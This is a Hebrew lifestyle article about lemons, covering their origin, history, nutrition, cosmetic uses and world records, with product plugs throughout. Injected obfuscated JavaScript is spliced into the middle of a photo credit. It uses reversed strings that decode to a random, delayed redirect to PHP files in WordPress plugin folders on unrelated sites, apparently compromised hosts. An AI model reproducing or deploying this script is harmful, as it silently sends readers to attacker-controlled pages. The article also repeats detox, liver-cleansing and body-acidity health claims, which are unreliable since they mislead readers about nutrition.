fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

החמוץ הכי מתוק בסביבה

כשהחיים נותנים לכם לימונים, תעשו מהם לימונדה, אמרו חכמים וצדקו, שכן מתברר שהלימון מפחית סוכר, תורם לירידה במשקל ונהדר אפילו לטיפול בפצעי אקנה
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

הידעתם כי כל הלימונים וגם הליים הם בעצם תוצאה של הכלאת אתרוג עם פרי הדר אחר?  ובכן, מתברר שהלימון הוא למעשה הכלאה ספונטנית של אתרוג עם תפוז מר (חושחש), שהוא בעצמו צאצא של פומלו ומנדרינה – כך לפי מכון וולקני.

הלימון, הוא בן למשפחת הפיגמיים ומקורו, כמרבית פירות ההדר, מהאזורים הטרופיים שממזרח להימלאיה ומאזור פנג'ב/ אסאם שבגבול הודו–פקיסטן, שם הוא מתועד בשימוש ובגידול חקלאי כבר אלפי שנים.

עץ הלימון הוא ירוק-עד חזק, בגובה של 3.5 מטרים ורוחב של 3 מטרים. מצויים כ-16 מינים שלו, מתוכם כל זני הלימון המסחריים משתייכים למין אחד x Citrus למעט לימון מאייר ששייך למין בשם gambhiri Citrus. לעץ קוצים גסים, עלוותו מוארכת ומבריקה וייחודית בריחה הלימוני. הפריחה הארומטית לבנה מבפנים ואדמדמה בחוץ (בשאר מיני ההדרים הפרח כולו לבן).

או דה טואלט סזאר לגברים של שיק תמרוקים | צילום: יח"צ
או דה טואלט סזאר לגברים של שיק תמרוקים | צילום: יח"צ

בוסתני האצילים

בתחילת המילניום הראשון, קצת אחרי לידת ישוע, הגיעו הלימונים לאזורנו שנשלט בשעתו על ידי האימפריה הביזנטית, אולם נדמה כי הרומאים פחות אהבו את הפרי, והפרסים בני המאה השמינית לספירה היו למעשה הראשונים לאמץ אותו לשימוש קולינרי נרחב.

משם הופץ הלימון לשאר המזרח התיכון. תחילה הוא כבש את המטבח הערבי בעיראק ועם כיבושי המוסלמים את דרום אירופה הוא הגיע גם לאיטליה דרך ציי הסוחר של גנואה וונציה, ושם החל שימוש נרחב בו. במאה ה-15 הפך הלימון לעץ פרי פופולרי בבוסתני האצילים ונחשב כמוצר מותרות ששימש בעיקר משפחות בעלות אמצעים. צורתו וניחוחו נחרזו בשירה ובספרי הבישול.

לאמריקה הגיע הלימון, עת קולומבוס לקח איתו את זרעי הפרי לעולם החדש. במהלך הבהלה לזהב בקליפורניה של המאה ה-19, אנשים היו מוכנים לשלם דולר (שווי של כ-25 דולר כיום) עבור לימון אחד, בשל סגולותיו הרפואיות שהגנו על הכורים ממחלת הצפדינה.

קרם פילינג ביוטכנולוגי של תפוח טכנולוגיות | צילום: יח"צ
קרם פילינג ביוטכנולוגי של תפוח טכנולוגיות | צילום: יח"צ

בימינו נהוג להלל את הלימון מדי שנה בחודש פברואר, וכבר 86 שנים ברציפות מתקיימות "חגיגות הלימון" במנטון, השוכנת כשעה נסיעה מניס, על גבול צרפת-איטליה, כשבמוקד החגיגות ניצב הפרי הצהבהב ועציו הנחשבים לסמליה של העיר. אלה מצוינים באירועי קולינריה, אמנות ותהלוכות קרנבל.

עץ הלימון פורח בקיץ ונותן את פירותיו בסתיו ובחורף, אולם למעשה הפרי זמין לרכישה בכל ימות השנה. הוא צהוב, גדול ובעל חמיצות מוכרת ורמת סוכר גבוהה ומוערך מאוד מבחינה בריאותית, משום שנחשב למקור טוב ואמין לוויטמין C המסייע בהצטננות ובהורדת חום, לוויטמיני B, לסידן, לברזל, למגנזיום ולסיבים תזונתיים. שתיית מיץ לימון מסייעת למערכת העיכול ומנקה את הכבד. הלימון, שמכיל 6-5 אחוז חומצה ציטרית, שהיא מקור הטעם החמוץ, מכיל גם יותר אשלגן מאשר תפוחים או ענבים.

לימונצ'לו בייבוא כספי משקאות חריפים | צילום: יח"צ
לימונצ'לו בייבוא כספי משקאות חריפים | צילום: יח"צ

מוסיף המון?

"הלימון מכיל כמות גבוהה של ויטמין C ונוגדי חמצון. הוא מחזק את המערכת החיסונית, מסייע להליך הרזיה בריא, מסייע לניקוי רעלים ומזרז את פעילות מערכת העיכול. ללימון רכיבים רבים המסייעים לניקוי ונטרול של רעלים שונים, בדגש על רעלים נרקוטיים. מומלץ לשתות בכל יום מיץ לימון עם מעט מים על מנת לסייע לפינוי עודפי רעלים מהגוף", אומרת חלי ממן, מייסדת קבוצות תמיכה לאורח חיים בריא.

לשאלה האם מים עם לימון באמת מסייעים לרדת במשקל? משיבה ממן כי מדובר במיתוס וכי אין מנוס מצמצום קלורי. "מים עם לימון ומלפפונים לא גורמים לירידה במשקל. אבל, וזה אבל גדול – אם שותים מים עם לימון וזה עושה לך הרגשה טובה, ובסוג של תהליך פסיכולוגי זה מעלה לך את המוטיבציה – אז שווה להמשיך. זה מעולה. כי כמות המים שצריך לשתות כאן היא גדולה, ומים מייצרים תחושה של שובע וזה נחשב כחיסכון קלורי וזו התרומה בעצם לירידה במשקל. מים עם לימון או בלעדיו בכמות הזאת תורמים לחילוף החומרים, אבל אין מה לעשות – מה שבסוף גורם באמת לירידה במשקל זה צמצום קלורי".

שיא גינס. הלימון הגדול בעולם, 5.26 ק"ג, הוא ישראלי מכפר זיתים | צילום: דף הפייסבוק, Guinness World Records
שיא גינס. הלימון הגדול בעולם, 5.26 ק"ג, הוא ישראלי מכפר זיתים | צילום: דף הפייסבוק, Guinness World Records

למעט שתייה של מים עם לימון, שכאמור מאזנת את רמת החומציות בגוף ומסייעת בשמירה על המערכת החיסונית, ובכך, מגינה מציפורניהם הקשוחות של רוב סוגי הזיהומים, הרי שהשמן המופק מהלימון נחשב למטהר ולמחטא טבעי. הוא נוגד זיהומים, נוגד פטריות, נוגד זיהומים ונוגד דלקת, ולכן עשוי להתאים לטיפול גם בתהליכים הקשורים בכאב – ממיגרנה ועד לדלקת מפרקים.

בנוסף, שמן לימון יכול להועיל לטיפול בשיער פגום, להרחקת קשקשים ולטיפוח עור הפנים, וזאת הודות לנוגדי החמצון המסייעים לחטא ולהקטין פגמים בעור, ומסיבה זאת חומצת הלימון שכיחה מאוד בפורמולות של מוצרי טיפוח וקוסמטיקה.

כפכפי נשים של תמנון | צילום: מעיין קלימיאן
כפכפי נשים של תמנון | צילום: מעיין קלימיאן

"כאשר משתמשים בשמן לימון במהלך עיסוי קוסמטי, הוא מהדק את הנקבוביות, מסייע להסרת התאים המתים ואף יכול להבהיר את גוון העור. הוא נחשב לרכיב מקרר, משמר ומחטא ולכן יעיל במיוחד בטיפול בעור עייף ושמן, וגם כפתרון לבעיות עור מורכבות יותר כגון אקנה, היפר פיגמנטציה וצלוליטיס", אומרת סיגל קדם, המדריכה המקצועית בחברת תפוח טכנולוגיות.

שמן הלימון גם מרגיע ומשרה שינה, ככה שאתם פשוט יכולים לשכב, להתרווח, להירגע ולהתמסר לו. בהקשר זה, כדי להציג את הפיתוח החדש מבית רסקיו.  הטיפות לשלווה ולרוגע יומיומי, המבוססות על תמציות פרחי באך, מוצעות עתה גם כסוכריות גומי חמצמצות בטעם לימוני הודות לתמציות טבעיות של הפרי.

משקל למטבח של המותג beurer. להשיג ברשת KSP ובחנויות האון ליין השונות | צילום: יח"צ
משקל למטבח של המותג beurer. להשיג ברשת KSP ובחנויות האון ליין השונות | צילום: יח"צ

הלימון הכי גדול בעולם

הודו נחשבת ליצרנית הלימון הגדולה ביותר בעולם עם כ-3 מיליון טונות בשנה. במקום השני נמצאת ברזיל עם ייצור של 1.5 מיליון טונות לימון בשנה, וסין נמצאת במקום השלישי.

ב-8 בינואר 2003 נרשם בספר השיאים של גינס "הלימון הגדול ביותר בעולם",  במשקל 5.26 ק"ג – שיא שלא נשבר זה 16 שנים. הלימון האמור גדל בפרדס של אהרון שמואל, חקלאי ישראלי מכפר זיתים.

אשתקד נרשם מחסור חמור בלימונים באוסטרליה, מה שגרם למחיר הפרי לזנק ב-300 אחוז ולקפץ מ-4 דולר לק"ג לכ-13 דולר לק"ג, ובכך הפך הלימון באוסטרליה ליקר יותר ממנגו, מאננס ואף ממוצרי בשר מסוימים. גל החום ששרר ביבשת אשתקד פגע ביבול העונתי, מה שהכריח את החקלאים להעלות מחירים – ואת המדינה להתחיל להסתמך על יבוא פרי ההדר מחו"ל.

באלם לימון לשפתיים יבשות של ליפסמקר | צילום: יח"צ
באלם לימון לשפתיים יבשות של ליפסמקר | צילום: יח"צ

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות